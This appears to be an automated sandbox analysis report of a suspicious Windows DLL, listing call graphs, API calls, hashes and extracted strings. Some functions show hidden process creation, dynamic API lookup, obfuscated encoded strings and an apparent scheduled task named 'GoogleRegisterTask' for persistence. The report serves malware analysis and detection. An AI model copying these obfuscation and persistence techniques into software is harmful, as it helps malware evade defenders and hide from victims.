14745 6bee104e __vfwprintf_l 14744->14745 14748 6beec76c 14745->14748 14749 6beec780 __vfwprintf_l 14748->14749 14754 6bee85e0 14749->14754 14755 6bee860f 14754->14755 14756 6bee85ec 14754->14756 14758 6bee8636 14755->14758 14777 6bee83be 14755->14777 14768 6beede7c 14756->14768 14760 6beede7c __vfwprintf_l 29 API calls 14758->14760 14761 6bee8607 14758->14761 14760->14761 14762 6bee7d4e 14761->14762 14763 6bee7d5a 14762->14763 14764 6bee7d71 14763->14764 14765 6bee8197 __vfwprintf_l 39 API calls 14763->14765 14766 6bee1058 14764->14766 14767 6bee8197 __vfwprintf_l 39 API calls 14764->14767 14765->14764 
6beef0b1 __DllMainCRTStartup@12 43 API calls 16117->16119 16125 6bee7f8c 16117->16125 16118 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 16120 6bee80fe 16118->16120 16121 6bee7fe0 16119->16121 16120->16110 16122 6bee8012 ReadFile 16121->16122 16121->16125 16123 6bee8039 16122->16123 16122->16125 16124 6beef0b1 __DllMainCRTStartup@12 43 API calls 16123->16124 16124->16125 16125->16118 16127 6beeeea2 __fread_nolock 39 API calls 16126->16127 16128 6bee7d9d 16127->16128 16129 6bee7de7 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __DllMainCRTStartup@12 16128->16129 16130 6beef0b1 __DllMainCRTStartup@12 43 API calls 16128->16130 16129->16110 16131 6bee7e44 16130->16131 16131->16129 16132 6beef0b1 __DllMainCRTStartup@12 43 API calls 16131->16132 16132->16129 16134 6beeeed5 __FrameHandler3::FrameUnwindToState 16133->16134 16135 6beeef18 16134->16135 16136 6beeef5e 16134->16136 16143 6bee7bc3 16134->16143 16137 6beede7c __vfwprintf_l 29 API calls 16135->16137 16144 6bef5062 RtlEnterCriticalSection 16136->16144 16137->16143 16139 6beeef64 16140 6beeef85 16139->16140 16141 6beeefee __wsopen_s 41 API calls 16139->16141 16145 6beeefe6 16140->16145 16141->16140 16143->16106 16143->16108 16143->16110 16144->16139 16148 6bef5117 RtlLeaveCriticalSection 16145->16148 16147 6beeefec 16147->16143 16148->16147 16149->16097 16151 6beecdae __FrameHandler3::FrameUnwindToState 16150->16151 16152 6beecddb 16151->16152 16153 6beecdb8 16151->16153 16160 6beecdd3 __DllMainCRTStartup@12 16152->16160 16161 6beecc7d RtlEnterCriticalSection 16152->16161 16154 6beede7c __vfwprintf_l 29 API calls 16153->16154 16154->16160 16156 6beecdf9 16162 6beece39 16156->16162 16158 6beece06 16176 6beece31 16158->16176 16160->15946 16161->16156 16163 6beece69 16162->16163 16164 6beece46 16162->16164 16166 6bef1d58 __vfwprintf_l 64 API calls 16163->16166 16174 6beece61 __DllMainCRTStartup@12 16163->16174 16165 6beede7c __vfwprintf_l 29 API calls 16164->16165 16165->16174 16167 
6beece81 16166->16167 16179 6bef1e2f 16167->16179 16170 6beeeea2 __fread_nolock 39 API calls 16171 6beece95 16170->16171 16183 6bef2473 16171->16183 16174->16158 16175 6bef0444 __freea 14 API calls 16175->16174 16225 6beecc91 RtlLeaveCriticalSection 16176->16225 16178 6beece37 16178->16160 16180 6bef1e46 16179->16180 16182 6beece89 16179->16182 16181 6bef0444 __freea 14 API calls 16180->16181 16180->16182 16181->16182 16182->16170 16185 6beece9c 16183->16185 16186 6bef249c 16183->16186 16184 6bef24eb 16187 6beede7c __vfwprintf_l 29 API calls 16184->16187 16185->16174 16185->16175 16186->16184 16188 6bef24c3 16186->16188 16187->16185 16190 6bef23e2 16188->16190 16191 6bef23ee __FrameHandler3::FrameUnwindToState 16190->16191 16225->16178 16227 6beedbc2 __FrameHandler3::FrameUnwindToState 16226->16227 16228 6beedc0c 16227->16228 16230 6beedbd5 __fread_nolock 16227->16230 16238 6beedbb1 16227->16238 16239 6beecc7d RtlEnterCriticalSection 16228->16239 16231 6bef0431 __dosmaperr 14 API calls 16230->16231 16233 6beedbef 16231->16233 16232 6beedc16 16240 6beed9c0 16232->16240 16235 6beedef9 __wsopen_s 39 API calls 16233->16235 16235->16238 16238->14705 16239->16232 16243 6beed9d2 __fread_nolock 16240->16243 16246 6beed9ef 16240->16246 16241 6beed9df 16243->16241 16243->16246 16251 6beeda30 __fread_nolock 16243->16251 16253 6beedc4b 16246->16253 16251->16246 16365 6beec37b __vfwprintf_l 39 API calls 16364->16365 16498->14743

              Control-flow Graph

              APIs
              • FindFirstFileW.KERNELBASE(?,?,?,?,?,316303B8), ref: 6BEE1C0B
              • _strlen.LIBCMT ref: 6BEE1D30
              • ExpandEnvironmentStringsW.KERNEL32(?,?,000000FF), ref: 6BEE1D9D
              • FindNextFileW.KERNELBASE(?,?,?,?,?,316303B8), ref: 6BEE1FAC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: FileFind$EnvironmentExpandFirstNextStrings_strlen
              • String ID: %s\%s$%s\%s$%s\%s$%s\*.*$-a $GoogleRegisterTask$IRA3BDVBaRAtB@VB[BAzBDVBYtAsBKRBOdApBD7BbtB>$PT30S$s`bovb-f{f
              • API String ID: 4146766196-3364674013
              • Opcode ID: bb3a420eba7aeabce63e2fb95ee13f917c11a8267c7a8b6a6f9f58e947cdaff6
              • Instruction ID: 22482656f092e4683b9f7f92fb432bd9de3a650c929af0b4233837df695f8a93
              • Opcode Fuzzy Hash: bb3a420eba7aeabce63e2fb95ee13f917c11a8267c7a8b6a6f9f58e947cdaff6
              • Instruction Fuzzy Hash: 95C1C1B1904249EBDF20DFA4DC06FED3BB8BB05304F604069F905DA1A1EB39DA85DB61

              Control-flow Graph

              APIs
                • Part of subcall function 6BEE171F: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6BEE175A
                • Part of subcall function 6BEE171F: _strlen.LIBCMT ref: 6BEE177C
                • Part of subcall function 6BEE171F: GetProcAddress.KERNEL32(?), ref: 6BEE17E2
                • Part of subcall function 6BEE171F: _strlen.LIBCMT ref: 6BEE180D
              • _strlen.LIBCMT ref: 6BEE4460
              • GetEnvironmentVariableW.KERNEL32(?,?,00000032), ref: 6BEE44CA
              • _strlen.LIBCMT ref: 6BEE44F0
              • _strlen.LIBCMT ref: 6BEE4571
              • _strlen.LIBCMT ref: 6BEE45E8
                • Part of subcall function 6BEE192F: _strlen.LIBCMT ref: 6BEE19BD
                • Part of subcall function 6BEE192F: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6BF074C4), ref: 6BEE1A5E
              • Sleep.KERNELBASE(000005DC), ref: 6BEE4654
              • Sleep.KERNELBASE(00007530), ref: 6BEE465F
              • _strlen.LIBCMT ref: 6BEE4685
              • _strlen.LIBCMT ref: 6BEE4706
                • Part of subcall function 6BEE1B85: FindFirstFileW.KERNELBASE(?,?,?,?,?,316303B8), ref: 6BEE1C0B
              Strings
              • %s%s, xrefs: 6BEE46C4
              • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB, xrefs: 6BEE45C8
              • [BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBRtAzBKhB`BA3BD;B[BAiBKJBfRAtBKRBLBB1B@7BYBAkBKRB, xrefs: 6BEE44D0
              • [BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>, xrefs: 6BEE46E6
              • VtAuBDZBgBA0BDFB`dAoBEtBRtApBDFB`tAyBDVB`tA`BFNBWBAWBFhBQBA`BKpBNBAjBGhBNRAkBG`BMBAjB@3BZRAhBG`BZtBwBGRBZRB6BDRBORAjBGVBMdByB@3BNdB6BDVBYRAnBGhBNRB1BG`BNRB0BGJBeRA`BFhBadAtBKJBatAiBENBYRAzBKZBYRAzBGNBNdB>, xrefs: 6BEE4551
              • %s%s, xrefs: 6BEE452F
              • gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>, xrefs: 6BEE4440
              • %s%s, xrefs: 6BEE4745
              • [BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB, xrefs: 6BEE4665
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: _strlen$Sleep$AddressCreateEnvironmentFileFindFirstHandleModuleProcProcessVariable
              • String ID: %s%s$%s%s$%s%s$VtAuBDZBgBA0BDFB`dAoBEtBRtApBDFB`tAyBDVB`tA`BFNBWBAWBFhBQBA`BKpBNBAjBGhBNRAkBG`BMBAjB@3BZRAhBG`BZtBwBGRBZRB6BDRBORAjBGVBMdByB@3BNdB6BDVBYRAnBGhBNRB1BG`BNRB0BGJBeRA`BFhBadAtBKJBatAiBENBYRAzBKZBYRAzBGNBNdB>$[BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBRtAzBKhB`BA3BD;B[BAiBKJBfRAtBKRBLBB1B@7BYBAkBKRB$[BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>$[BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB$gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>
              • API String ID: 405535372-2132796354
              • Opcode ID: 288a13779b8c475d641da619b79603d5828e07265e1c806321945be78445982b
              • Instruction ID: 24e5d7b0d2d919a20b46932cb998c66671b6fd15010d3c71c55cf28d10369c2d
              • Opcode Fuzzy Hash: 288a13779b8c475d641da619b79603d5828e07265e1c806321945be78445982b
              • Instruction Fuzzy Hash: 90A10CB2C4025CABDF31DBE8DC86FDD7BB8AF08208F14401AE514A7152EF3996598F65

              Control-flow Graph

              APIs
              • _strlen.LIBCMT ref: 6BEE19BD
              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6BF074C4), ref: 6BEE1A5E
              • _strlen.LIBCMT ref: 6BEE1AC4
              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6BF074E0), ref: 6BEE1B60
              Strings
              • %s %s, xrefs: 6BEE1B26
              • `dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>, xrefs: 6BEE199D
              • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB, xrefs: 6BEE1AA4
              • %s %s, xrefs: 6BEE1A24
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: CreateProcess_strlen
              • String ID: %s %s$%s %s$`dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB
              • API String ID: 3222040079-4228346574
              • Opcode ID: 654068aad079cb806c8d46102f7e2b28fbba9ed25b0e4216fbbae32918317186
              • Instruction ID: 755975a60acb6d04c461873ee48bc8d5a64cc69ac63c941446db3c89d0dd1ce0
              • Opcode Fuzzy Hash: 654068aad079cb806c8d46102f7e2b28fbba9ed25b0e4216fbbae32918317186
              • Instruction Fuzzy Hash: 305166B2D40248ABEB20DFF4DC42FDD77B8AF04748F240019F618E6191EBB9A6558B65

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 192 6bee4d53-6bee4d64 call 6bee5570 195 6bee4d66-6bee4d6c 192->195 196 6bee4d75-6bee4d7c 192->196 195->196 197 6bee4d6e-6bee4d70 195->197 198 6bee4d7e-6bee4d81 196->198 199 6bee4d88-6bee4d9c dllmain_raw 196->199 200 6bee4e4e-6bee4e5d 197->200 198->199 201 6bee4d83-6bee4d86 198->201 202 6bee4e45-6bee4e4c 199->202 203 6bee4da2-6bee4db3 dllmain_crt_dispatch 199->203 204 6bee4db9-6bee4dbe call 6bee1000 201->204 202->200 203->202 203->204 206 6bee4dc3-6bee4dcb 204->206 207 6bee4dcd-6bee4dcf 206->207 208 6bee4df4-6bee4df6 206->208 207->208 209 6bee4dd1-6bee4def call 6bee1000 call 6bee4ca3 dllmain_raw 207->209 210 6bee4dfd-6bee4e0e dllmain_crt_dispatch 208->210 211 6bee4df8-6bee4dfb 208->211 209->208 210->202 213 6bee4e10-6bee4e42 dllmain_raw 210->213 211->202 211->210 213->202
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: dllmain_raw$dllmain_crt_dispatch
              • String ID:
              • API String ID: 3136044242-0
              • Opcode ID: a49a85cb2a31dbcc8a730eaf23912b8b77f5128d327c1f982895dbf4000feca4
              • Instruction ID: 6679847cc9f9292a90d0af25d7fa286c522bd3dadc09ca677b5b9d10b92a3f9f
              • Opcode Fuzzy Hash: a49a85cb2a31dbcc8a730eaf23912b8b77f5128d327c1f982895dbf4000feca4
              • Instruction Fuzzy Hash: 6E219172D00629AFDB214F65CC41A6F3B79EB85B98F21415BF8245B224D3398E538BB0

              Control-flow Graph

              APIs
              • __RTC_Initialize.LIBCMT ref: 6BEE4BE9
                • Part of subcall function 6BEE50D5: RtlInitializeSListHead.NTDLL(6BF06DC0), ref: 6BEE50DA
              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6BEE4C53
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
              • String ID:
              • API String ID: 3231365870-0
              • Opcode ID: fe637fce3ebc5bf57a9c2795b32d1f79b352c0252e63d4767e067a4f65c675a4
              • Instruction ID: f458166c8bd5044dba770b9c17a20bfc61626acbd43a8ec129a14be4015c3b68
              • Opcode Fuzzy Hash: fe637fce3ebc5bf57a9c2795b32d1f79b352c0252e63d4767e067a4f65c675a4
              • Instruction Fuzzy Hash: A021F036648301AAEB10ABB4881639C37F1AF1632DF30448EE645672D0DB2E6157D675

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 261 6bef0258-6bef025d 262 6bef025f-6bef0277 261->262 263 6bef0279-6bef027d 262->263 264 6bef0285-6bef028e 262->264 263->264 265 6bef027f-6bef0283 263->265 266 6bef02a0 264->266 267 6bef0290-6bef0293 264->267 269 6bef02fa-6bef02fe 265->269 268 6bef02a2-6bef02af GetStdHandle 266->268 270 6bef029c-6bef029e 267->270 271 6bef0295-6bef029a 267->271 272 6bef02dc-6bef02ee 268->272 273 6bef02b1-6bef02b3 268->273 269->262 274 6bef0304-6bef0307 269->274 270->268 271->268 272->269 276 6bef02f0-6bef02f3 272->276 273->272 275 6bef02b5-6bef02be GetFileType 273->275 275->272 277 6bef02c0-6bef02c9 275->277 276->269 278 6bef02cb-6bef02cf 277->278 279 6bef02d1-6bef02d4 277->279 278->269 279->269 280 6bef02d6-6bef02da 279->280 280->269
              APIs
              • GetStdHandle.KERNEL32(000000F6), ref: 6BEF02A4
              • GetFileType.KERNELBASE(00000000), ref: 6BEF02B6
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: FileHandleType
              • String ID:
              • API String ID: 3000768030-0
              • Opcode ID: 1c2f065701d6b568efe20e6bab2c2c5e8cdc1f23af4b95d3f131688a12e03cac
              • Instruction ID: cf1defb6c1a03187a354203713a03323a9753a9baf82a20d9d8cf2b5cf638d6b
              • Opcode Fuzzy Hash: 1c2f065701d6b568efe20e6bab2c2c5e8cdc1f23af4b95d3f131688a12e03cac
              • Instruction Fuzzy Hash: A411B4716047524AEB228E3ECC84712BB9CA74B375B34079AD0B6966F3C738D5978260

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 281 6bef1658-6bef1663 282 6bef1665-6bef166f 281->282 283 6bef1671-6bef1677 281->283 282->283 284 6bef16a5-6bef16b0 call 6bef0431 282->284 285 6bef1679-6bef167a 283->285 286 6bef1690-6bef16a1 RtlAllocateHeap 283->286 291 6bef16b2-6bef16b4 284->291 285->286 287 6bef167c-6bef1683 call 6bef5ac9 286->287 288 6bef16a3 286->288 287->284 294 6bef1685-6bef168e call 6beedf8f 287->294 288->291 294->284 294->286
              APIs
              • RtlAllocateHeap.NTDLL(00000008,6BEE1775,6BEEC75A), ref: 6BEF1699
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 42314b988e7d4ee8852907fe2917ecfbac33cad8a265e7db41b3af459870ab92
              • Instruction ID: 7859c14feda37ece145cdf415e6c4c5b61ee89ff58d369f093d2bb5aede9f69c
              • Opcode Fuzzy Hash: 42314b988e7d4ee8852907fe2917ecfbac33cad8a265e7db41b3af459870ab92
              • Instruction Fuzzy Hash: 2EF0E07554463C5BEB114EF5C805B5A374C9F42768F7A8165DC14D6250DF28D4138AE3

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 297 6bee1000-6bee100e 298 6bee1012-6bee1019 call 6bee4402 ExitProcess 297->298 299 6bee1010-6bee101f 297->299
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: ExitProcess
              • String ID:
              • API String ID: 621844428-0
              • Opcode ID: f7dc9035dbaf2b48a95d61ee83f7f2e2a09dd5245d2595eb1be4c53e6f1efcf8
              • Instruction ID: 4a4af57ec910b0e09b3e28672bcff56d3754f426284e6352512c9bad8d390aad
              • Opcode Fuzzy Hash: f7dc9035dbaf2b48a95d61ee83f7f2e2a09dd5245d2595eb1be4c53e6f1efcf8
              • Instruction Fuzzy Hash: 95D01274645258EBCB009BF4C806B4D77F8EB09715F60C065E51697240D638AE46A533
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: __floor_pentium4
              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
              • API String ID: 4168288129-2761157908
              • Opcode ID: 02afc7e41b57cda4c9ab53833dc7700da782621da8ceeb577398a80d975fdffd
              • Instruction ID: 970f0a05ce7f9a414bc398839467f00a4f2d3459c012f8739ae429416a295b1b
              • Opcode Fuzzy Hash: 02afc7e41b57cda4c9ab53833dc7700da782621da8ceeb577398a80d975fdffd
              • Instruction Fuzzy Hash: 19D24C71E086288FDB65CE28CD407DAB7B9EB85305F2441EAD40DE7240E779AE86CF41
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 10941fa296378a8a5a9f7a9e3a6299de1727250a8a886395a75c3011d5e11ab4
              • Instruction ID: e7b26376c129ad373e760ce0663c03027cf23c349bd385bdc794c062c32d1e7b
              • Opcode Fuzzy Hash: 10941fa296378a8a5a9f7a9e3a6299de1727250a8a886395a75c3011d5e11ab4
              • Instruction Fuzzy Hash: DA023D71E012199FDB14CFA8C89069EFBF5FF48318F2482A9D919E7380D735A952CB90
              APIs
              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6BEE53FA
              • IsDebuggerPresent.KERNEL32 ref: 6BEE54C6
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6BEE54DF
              • UnhandledExceptionFilter.KERNEL32(?), ref: 6BEE54E9
              Memory Dump Source
              • Source File: 00000000.00000002.2161385477.000000006BEE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 6BEE0000, based on PE: true
              • Associated: 00000000.00000002.2161368422.000000006BEE0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161385477.000000006BF06000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161385477.000000006BF0B000.00000040.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161450529.000000006BF0D000.00000080.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2161466522.000000006BF0E000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6bee0000_loaddll32.jbxd
              Similarity
              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
              • String ID:
              • API String ID: 254469556-0
              • Opcode ID: 56d914645bdd6b1a8ca3346c77b85ea04fd50f0422f7684cc950bf7e45b9d8d4
              • Instruction ID: f7c83e5fb615dffff9bddebc182157f3c1735c5e33a1dca2442c3201b871e158
              • Opcode Fuzzy Hash: 56d914645bdd6b1a8ca3346c77b85ea04fd50f0422f7684cc950bf7e45b9d8d4
              • Instruction Fuzzy Hash: 273105B5D0531C9ADF21DFA0D8497CDBBB8AF08304F2041EAE50DAB240EB749A858F55
              APIs
              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,6BEE1775), ref: 6BEEDDF5
              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,6BEE1775), ref: 6BEEDDFF
              • UnhandledExceptionFilter.KERNEL32(6BEE144D,?,?,?,?,?,6BEE1775), ref: 6BEEDE0C
              Similarity
              • API ID: ExceptionFilterUnhandled$DebuggerPresent
              • String ID:
              • API String ID: 3906539128-0
              APIs
              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6BEFB864,?,?,00000008,?,?,6BEFB467,00000000), ref: 6BEFBA96
              Similarity
              • API ID: ExceptionRaise
              • String ID:
              • API String ID: 3997070919-0
              APIs
